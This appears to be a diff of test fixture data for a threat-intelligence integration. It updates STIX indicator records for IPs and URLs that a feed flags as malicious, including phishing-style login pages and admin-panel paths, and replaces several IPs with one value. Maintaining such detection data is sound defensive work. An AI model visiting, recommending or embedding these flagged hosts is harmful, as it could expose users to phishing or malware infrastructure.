- "original": "{\"created\":\"2020-02-25T02:52:38.025Z\",\"description\":\"TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-39\"],\"modified\":\"2020-02-25T02:52:38.025Z\",\"name\":\"mal_ip: 81.177.135.161\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '81.177.135.161']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.025Z\"}",
+ "ingested": "2021-12-13T08:38:40.026548900Z",
+ "original": "{\"created\":\"2020-02-25T02:52:38.025Z\",\"description\":\"TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-39\"],\"modified\":\"2020-02-25T02:52:38.025Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.025Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -30532,7 +30532,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390537810Z",
+ "ingested": "2021-12-13T08:38:40.026555600Z",
 "original": "{\"created\":\"2020-02-25T02:52:38.053Z\",\"description\":\"TS ID: 55347597470; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--c36b85d9-df19-439b-8605-d7c4b0653977\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:52:38.053Z\",\"name\":\"mal_url: http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.053Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -30584,7 +30584,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390545585Z",
+ "ingested": "2021-12-13T08:38:40.026562300Z",
 "original": "{\"created\":\"2020-02-25T02:52:38.531Z\",\"description\":\"TS ID: 55347597659; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--862bddc3-1b58-45b2-a40d-502d50369e0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-25T02:52:38.531Z\",\"name\":\"mal_url: http://jusqit.com/2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jusqit.com/2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.531Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -30635,7 +30635,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390551215Z",
+ "ingested": "2021-12-13T08:38:40.026569100Z",
 "original": "{\"created\":\"2020-02-25T02:52:38.564Z\",\"description\":\"TS ID: 55347597488; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--d16f564b-6c1f-4515-97e7-d9a19515dd78\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-25T02:52:38.564Z\",\"name\":\"mal_url: http://webupdateadobe.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://webupdateadobe.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.564Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -30687,7 +30687,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390555453Z",
+ "ingested": "2021-12-13T08:38:40.026575900Z",
 "original": "{\"created\":\"2020-02-25T02:52:40.276Z\",\"description\":\"TS ID: 55347597520; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--2c31e18b-164e-42bc-afd8-04815a33e043\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:40.276Z\",\"name\":\"mal_url: http://gsddfsfasa.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gsddfsfasa.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.276Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -30706,7 +30706,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 45.143.92.129",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime",
 "modified": "2020-02-25T02:52:40.317Z",
 "valid_from": "2020-02-25T02:52:40.317Z",
@@ -30728,12 +30728,12 @@
 "first_seen": "2020-02-25T02:52:40.317Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "45.143.92.129"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390559340Z",
- "original": "{\"created\":\"2020-02-25T02:52:40.317Z\",\"description\":\"TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-25T02:52:40.317Z\",\"name\":\"mal_ip: 45.143.92.129\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '45.143.92.129']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.317Z\"}",
+ "ingested": "2021-12-13T08:38:40.026582500Z",
+ "original": "{\"created\":\"2020-02-25T02:52:40.317Z\",\"description\":\"TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-25T02:52:40.317Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.317Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -30784,7 +30784,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390562987Z",
+ "ingested": "2021-12-13T08:38:40.026589200Z",
 "original": "{\"created\":\"2020-02-25T02:52:40.344Z\",\"description\":\"TS ID: 55347597474; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--387937df-4030-4cfe-91b7-bd9795985adc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:40.344Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.344Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -30803,7 +30803,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 185.98.87.192",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime",
 "modified": "2020-02-25T02:52:41.781Z",
 "valid_from": "2020-02-25T02:52:41.781Z",
@@ -30825,12 +30825,12 @@
 "first_seen": "2020-02-25T02:52:41.781Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "185.98.87.192"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390566895Z",
- "original": "{\"created\":\"2020-02-25T02:52:41.781Z\",\"description\":\"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-25T02:52:41.781Z\",\"name\":\"mal_ip: 185.98.87.192\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.98.87.192']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:41.781Z\"}",
+ "ingested": "2021-12-13T08:38:40.026596100Z",
+ "original": "{\"created\":\"2020-02-25T02:52:41.781Z\",\"description\":\"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-25T02:52:41.781Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:41.781Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -30881,7 +30881,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390572315Z",
+ "ingested": "2021-12-13T08:38:40.026603Z",
 "original": "{\"created\":\"2020-02-25T02:52:52.59Z\",\"description\":\"TS ID: 55347597566; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--4f92667a-5e1b-4111-88d4-e3e04405e97a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:52.59Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/10/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/10/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.59Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -30933,7 +30933,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390576182Z",
+ "ingested": "2021-12-13T08:38:40.026609600Z",
 "original": "{\"created\":\"2020-02-25T02:52:52.623Z\",\"description\":\"TS ID: 55347597530; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--04bc5b54-46ae-44d7-96a6-863481383436\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:52.623Z\",\"name\":\"mal_url: http://anypontop.com/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://anypontop.com/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.623Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -30952,7 +30952,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 176.119.158.219",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime",
 "modified": "2020-02-25T02:52:52.674Z",
 "valid_from": "2020-02-25T02:52:52.674Z",
@@ -30974,12 +30974,12 @@
 "first_seen": "2020-02-25T02:52:52.674Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "176.119.158.219"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390580881Z",
- "original": "{\"created\":\"2020-02-25T02:52:52.674Z\",\"description\":\"TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--65a5607b-388a-4789-98d0-84d77ee94047\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:52.674Z\",\"name\":\"mal_ip: 176.119.158.219\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '176.119.158.219']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.674Z\"}",
+ "ingested": "2021-12-13T08:38:40.026616300Z",
+ "original": "{\"created\":\"2020-02-25T02:52:52.674Z\",\"description\":\"TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--65a5607b-388a-4789-98d0-84d77ee94047\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:52.674Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.674Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -31030,7 +31030,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390585049Z",
+ "ingested": "2021-12-13T08:38:40.026645200Z",
 "original": "{\"created\":\"2020-02-25T02:52:52.712Z\",\"description\":\"TS ID: 55347597467; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--b70344da-8137-4550-b569-97f0e3020ab1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:52:52.712Z\",\"name\":\"mal_url: http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.712Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31049,7 +31049,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 195.54.33.150",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime",
 "modified": "2020-02-25T02:52:55.912Z",
 "valid_from": "2020-02-25T02:52:55.912Z",
@@ -31071,12 +31071,12 @@
 "first_seen": "2020-02-25T02:52:55.912Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "195.54.33.150"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390588415Z",
- "original": "{\"created\":\"2020-02-25T02:52:55.912Z\",\"description\":\"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime\",\"id\":\"indicator--3ff92876-fac4-49a6-ae80-d123206dc224\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-25T02:52:55.912Z\",\"name\":\"mal_ip: 195.54.33.150\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '195.54.33.150']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:55.912Z\"}",
+ "ingested": "2021-12-13T08:38:40.026672Z",
+ "original": "{\"created\":\"2020-02-25T02:52:55.912Z\",\"description\":\"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime\",\"id\":\"indicator--3ff92876-fac4-49a6-ae80-d123206dc224\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-25T02:52:55.912Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:55.912Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -31126,7 +31126,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390592643Z",
+ "ingested": "2021-12-13T08:38:40.026680300Z",
 "original": "{\"created\":\"2020-02-25T02:53:04.191Z\",\"description\":\"TS ID: 55347597485; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--cb9b2721-6623-44c2-b1e5-143f2291738b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-25T02:53:04.191Z\",\"name\":\"mal_url: http://belt-yard-74.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://belt-yard-74.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:04.191Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31178,7 +31178,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390596650Z",
+ "ingested": "2021-12-13T08:38:40.026684500Z",
 "original": "{\"created\":\"2020-02-25T02:53:12.657Z\",\"description\":\"TS ID: 55347597478; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--04c56a59-3a16-4284-9edc-5445bb539ce5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:53:12.657Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:12.657Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31230,7 +31230,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390602021Z",
+ "ingested": "2021-12-13T08:38:40.026687900Z",
 "original": "{\"created\":\"2020-02-25T02:53:15.804Z\",\"description\":\"TS ID: 55347597559; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--1989ffaf-19a7-4850-b142-d31758a3751f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:15.804Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/11/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/11/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:15.804Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31249,7 +31249,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 104.227.250.186",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime",
 "modified": "2020-02-25T02:53:15.880Z",
 "valid_from": "2020-02-25T02:53:15.88Z",
@@ -31271,12 +31271,12 @@
 "first_seen": "2020-02-25T02:53:15.880Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "104.227.250.186"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390606329Z",
- "original": "{\"created\":\"2020-02-25T02:53:15.88Z\",\"description\":\"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime\",\"id\":\"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-25T02:53:15.88Z\",\"name\":\"mal_ip: 104.227.250.186\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '104.227.250.186']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:15.88Z\"}",
+ "ingested": "2021-12-13T08:38:40.026692900Z",
+ "original": "{\"created\":\"2020-02-25T02:53:15.88Z\",\"description\":\"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime\",\"id\":\"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-25T02:53:15.88Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:15.88Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -31327,7 +31327,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390611358Z",
+ "ingested": "2021-12-13T08:38:40.026698Z",
 "original": "{\"created\":\"2020-02-25T02:53:17.191Z\",\"description\":\"TS ID: 55347597555; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--fe0a731e-e2ff-49ac-a597-150ce46a31fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:17.191Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/12/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/12/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.191Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31379,7 +31379,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390614975Z",
+ "ingested": "2021-12-13T08:38:40.026704400Z",
 "original": "{\"created\":\"2020-02-25T02:53:17.224Z\",\"description\":\"TS ID: 55347597468; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--53d00201-4c9a-4275-9091-4cf08fda4676\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:53:17.224Z\",\"name\":\"mal_url: http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.224Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31431,7 +31431,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390618792Z",
+ "ingested": "2021-12-13T08:38:40.026711300Z",
 "original": "{\"created\":\"2020-02-25T02:53:17.256Z\",\"description\":\"TS ID: 55347597466; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--4e154929-35ec-4f71-8793-6b861a9a98f1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:53:17.256Z\",\"name\":\"mal_url: http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.256Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31483,7 +31483,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390626076Z",
+ "ingested": "2021-12-13T08:38:40.026718200Z",
 "original": "{\"created\":\"2020-02-25T02:53:17.916Z\",\"description\":\"TS ID: 55347597583; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--4ce097b7-254b-41cf-8c7d-934524548fd6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:17.916Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/8/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/8/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.916Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31535,7 +31535,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390629743Z",
+ "ingested": "2021-12-13T08:38:40.026725Z",
 "original": "{\"created\":\"2020-02-25T02:53:17.952Z\",\"description\":\"TS ID: 55347597508; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--51f063d7-600f-43c3-9f88-92e4b3b603da\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:53:17.952Z\",\"name\":\"mal_url: http://petrouretro.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petrouretro.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.952Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31587,7 +31587,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390633259Z",
+ "ingested": "2021-12-13T08:38:40.026731800Z",
 "original": "{\"created\":\"2020-02-25T02:53:17.983Z\",\"description\":\"TS ID: 55347597481; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--5c9b2227-96df-4cc8-ba6b-c23f4da9667a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-25T02:53:17.983Z\",\"name\":\"mal_url: http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.983Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31639,7 +31639,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390636756Z",
+ "ingested": "2021-12-13T08:38:40.026738600Z",
 "original": "{\"created\":\"2020-02-25T02:53:36.323Z\",\"description\":\"TS ID: 55347597534; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--751b74f4-ded7-426d-b425-cb9c2b3113a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:53:36.323Z\",\"name\":\"mal_url: http://agmardorecha.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://agmardorecha.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.323Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31690,7 +31690,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390640192Z",
+ "ingested": "2021-12-13T08:38:40.026745400Z",
